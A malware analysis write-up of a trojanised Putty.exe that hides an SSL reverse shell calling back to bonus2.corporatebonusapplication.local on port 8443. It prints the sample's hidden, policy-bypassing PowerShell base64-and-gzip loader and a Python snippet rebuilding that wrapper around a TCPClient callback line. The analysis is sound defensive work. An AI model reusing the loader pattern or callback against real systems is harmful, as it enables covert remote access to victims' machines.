Unmasking the Mystery: The Curious Case of the Putty Malware
Static Analysis, Dynamic Analysis & Reverse Engineering of Putty Malware
In the vast digital wilderness, malicious software like Putty.exe often hides in plain sight. With file hashes and VT analysis, we aim to expose the malware's nefarious intentions. So, put on your virtual trench coat, and let's decode this binary enigma.
File Hash & VT Analysis: Unveiling the Bad Boys
Our journey begins with a cryptic file hash (sha256sum output): 0c82e654c09c8fd9fdf4899718efa37670974c9eec5a8fc18a167f93cea6ee83 *putty.exe. According to VirusTotal (VT) analysis, a disconcerting 58/71 engines flag it as infected. It's clear; this is no ordinary binary.
Architecture:
Our malware is a 32-bit binary, lurking in the shadows of the digital realm. But what does it hide beneath the surface? Let's dig deeper.
Basic Static Analysis: Strings, Secrets, and Path-etic Discoveries
The binary doesn't give up its secrets easily. Strings and clues are hidden within, requiring us to employ creative techniques. Whether it's using the FLOSS command or a good old grep, we're determined to unearth the hidden messages within Putty.exe.
Strings & FLOSS Output:
Hidden within the binary, we discover strings that pique our interest. Among them is a PowerShell one-liner whose payload is encoded in base64.
powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('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'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
There's a twist—it's compressed with gzip. Our journey takes an unexpected turn.
After decoding and decompressing the payload, we found that it invokes a reverse shell on the target, wrapping the connection in SSL with a certificate for the host bonus2.corporatebonusapplication.local.
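To unwrap that base64-then-gzip layer statically, without ever handing the blob to PowerShell, the following added example (not code from the original write-up) rebuilds the decoder chain in Python. The stage-2 script and the one-liner it is wrapped in are constructed here to model only the indicators recovered above (the callback host and port); the real payload is not reproduced.

```python
import base64
import gzip
import re

# Constructed stand-in for the decompressed stage-2 script. Only the
# callback indicators found in the analysis are modelled; the SSL wrapping
# and shell loop of the real sample are deliberately left out.
SAMPLE_STAGE2 = (
    "$client = New-Object System.Net.Sockets.TCPClient("
    "'bonus2.corporatebonusapplication.local', 8443)\n"
)

def build_one_liner(script: str) -> str:
    """Wrap a script the way the sample does: gzip, then base64, inside the
    StreamReader/GzipStream/MemoryStream decoder chain (constructed, never run)."""
    blob = base64.b64encode(gzip.compress(script.encode("utf-8"))).decode("ascii")
    return (
        'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create('
        "(New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream("
        "(New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('"
        + blob
        + "'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))\""
    )

# Base64 alphabet only; the sample's blob is a single quoted argument.
B64_RE = re.compile(r"FromBase64String\('([A-Za-z0-9+/=]+)'\)")

def extract_stage2(one_liner: str) -> str:
    """Statically unwrap the FromBase64String + GzipStream layer."""
    m = B64_RE.search(one_liner)
    if not m:
        raise ValueError("no FromBase64String('...') blob found")
    raw = base64.b64decode(m.group(1))
    if raw[:2] != b"\x1f\x8b":  # gzip magic, as GzipStream expects
        raise ValueError("decoded blob is not gzip; check for another layer")
    return gzip.decompress(raw).decode("utf-8", errors="replace")

def extract_callback(stage2: str) -> tuple:
    """Pull the TCPClient('host', port) callback indicators out of the script."""
    m = re.search(r"TCPClient\(\s*'([^']+)'\s*,\s*(\d+)\s*\)", stage2, re.IGNORECASE)
    if not m:
        raise ValueError("no TCPClient(host, port) call found")
    return m.group(1), int(m.group(2))

if __name__ == "__main__":
    stage2 = extract_stage2(build_one_liner(SAMPLE_STAGE2))
    print(extract_callback(stage2))  # ('bonus2.corporatebonusapplication.local', 8443)
```

On a real sample, paste the FLOSS-recovered one-liner into extract_stage2 and read the decompressed script instead of running it.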
IAT & PE View:
We investigate further, dissecting the Import Address Table (IAT) and the Portable Executable (PE) view. Windows API calls are clearly in play, but because the malware is embedded in what otherwise looks like the legitimate Putty binary, the imports alone don't tell us which ones belong to the malicious functionality.
Basic Dynamic Analysis: The Plot Thickens
As we delve into dynamic analysis, we uncover the malware's initial detonation. A PowerShell window quietly opens in the background while the Putty interface appears as a decoy. Deception is at the heart of this operation.
Network Signatures:
Our digital detective work leads us to a significant discovery—a DNS lookup for "bonus2.corporatebonusapplication.local." Could this be the key to the malware's operation?
On further analysis, I found that it makes a TCP callback on port 8443. So the reverse shell is calling back to bonus2.corporatebonusapplication.local on port 8443.
Host Indicators:
Following the trail, we identify a PowerShell-based payload spawned as a child process.
By monitoring the Parent PID and employing tools like ProcMon, we get closer to the heart of the matter.
We can confirm the callback port with tcpview.
Now that we know the binary makes a callback to the host bonus2.corporatebonusapplication.local on port 8443, we can edit the /etc/hosts file to point that name at our own listener and catch the reverse shell, which will confirm our theory.
After configuring the hosts file and configuring a listener I ran the binary again and got a connection.
I was seeing garbage data because the reverse shell wraps its traffic in SSL and our plain listener has no matching certificate to terminate it, but the connection itself proves that this is a Putty-themed reverse shell backdoor (RAT).
Summary
In the realm of cybersecurity, analyzing malware is like solving a puzzle, and the Putty malware is one perplexing piece. The article takes you on a thrilling journey of dissecting this malicious binary. We uncover hidden strings, decode a base64-and-gzip-wrapped payload, and unveil a chilling conspiracy involving an SSL reverse shell. The hunt for clues leads us to the infamous host "bonus2.corporatebonusapplication.local" on port 8443. The article reveals how persistence and clever tricks are used to make it all happen, making it a must-read for aspiring cyber sleuths.
Conclusion
So, there you have it, our exhilarating journey through the enigmatic Putty malware. This tale of malware analysis showcases the incredible detective work that goes into understanding and combating cyber threats. Remember, in the ever-evolving world of cybersecurity, staying curious and vigilant is the key to keeping our digital lives safe from such sinister plots. Stay tuned for more exciting adventures in the world of cybersecurity!